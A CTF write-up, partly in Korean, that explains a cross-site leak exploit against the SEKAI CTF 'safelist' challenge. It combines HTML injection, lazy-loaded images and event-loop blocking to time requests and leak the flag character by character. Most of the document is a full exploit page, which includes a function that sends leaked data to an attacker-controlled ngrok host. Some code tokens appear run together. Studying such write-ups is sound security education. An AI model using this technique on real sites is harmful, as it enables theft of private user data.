In this exploit, @aszx87410 mixes the lazy image side channel technique through a HTML injection with kind of event loop blocking technique to leak chars.
이 익스플로잇은 다음 페이지에서 이미 언급된 CTF 챌린지에 대한 다른 익스플로잇입니다. 챌린지에 대한 더 많은 정보는 다음을 참조하세요:
공격자는 **"A"**로 시작하는 게시물을 주입할 수 있으며, 그러면 큰 **<canvas**와 같은 HTML 태그가 대부분의 화면을 채우고 최종 <img lazy 태그가 로드됩니다.
만약 공격자가 "A" 대신 "z"로 시작하는 동일한 게시물을 주입하면, 플래그가 있는 게시물이 먼저 나타나고, 그 다음에 주입된게시물이 초기 "z"와 함께 나타납니다. 플래그가 있는 게시물이 먼저 나타났기 때문에 첫 번째 캔버스가 모든 화면을 차지하고 최종 <img lazy 태그가 화면에 보이지 않게 되어 로드되지 않습니다.
그런 다음, 봇이 페이지에 접속하는 동안, 공격자는 fetch 요청을 보냅니다.
게시물에 주입된 이미지가 로드되고 있다면, 이 fetch 요청은 더 오래 걸리게 되므로 공격자는 게시물이 플래그보다 앞에 있다는 것을 알 수 있습니다 (알파벳 순으로).
만약 fetch 요청이 빠르다면, 이는 게시물이 플래그보다 알파벳 순으로뒤에 있다는 것을 의미합니다.
Let's check the code:
<!DOCTYPEhtml><html><!--The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.If images are loading, the request to "/" is slower, otherwise faster.By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.We can use fetch to measure the request time.--><body><buttononclick="run()">start</button><!-- Inject post with payload --><formid=faction="http://localhost:1234/create"method="POST"target="_blank"><inputid=inpname="text"value=""></form><!-- Remove index --><formid=f2action="http://localhost:1234/remove"method="POST"target="_blank"><inputid=inp2name="index"value=""></form><script>let flag ='SEKAI{'constTARGET='https://safelist.ctf.sekai.team'f.action =TARGET+'/create'f2.action =TARGET+'/remove'constsleep= ms =>newPromise(r =>setTimeout(r, ms))// Function to leak info to attackerconstsend= data =>fetch('http://server.ngrok.io?d='+data)constcharset='abcdefghijklmnopqrstuvwxyz'.split('')// start exploitlet count =0setTimeout(async () => {letL=0letR=charset.length-1// I have omited code here as apparently it wasn't necesary// fallback to linerar since I am not familiar with binary search lolfor(let i=R; i>=L; i--) {let c = charset[i]send('try_'+ flag + c)constfound=awaittestChar(flag + c)if (found) {send('found: '+ flag+c)flag += cbreak}}},0)asyncfunctiontestChar(str) {returnnewPromise(resolve => {/*For 3350, you need to test it on your local to get this number.The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading thresholdIf starts with "A", the image should be loaded because it's in the threshold.*/// <canvas height="3350px"> is experimental and allow to show the injected// images when the post injected is the first one but to hide them when// the injected post is after the post with the flaginp.value = str +'<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')f.submit()setTimeout(() => {run(str, resolve)},500)})}asyncfunctionrun(str, resolve) {// Open posts page 5 timesfor(let i=1; i<=5;i++) {window.open(TARGET)}let t =0constround=30//Lets time 30 requestssetTimeout(async () => {// Send 30 requests and time eachfor(let i=0; i<round; i++) {let s =performance.now()awaitfetch(TARGET+'/?test', {mode:'no-cors'}).catch(err=>1)let end =performance.now()t += end - sconsole.log(end - s)}constavg= t/round// Send info about how much time it tooksend(str +","+ t +","+"avg:"+ avg)/*I get this threshold(1000ms) by trying multiple times on remote admin botfor example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold*/constisFound= (t >=1000)if (isFound) {inp2.value ="0"} else {inp2.value ="1"}// remember to delete the post to not break our leak oraclef2.submit()setTimeout(() => {resolve(isFound)},200)},200)}</script></body></html>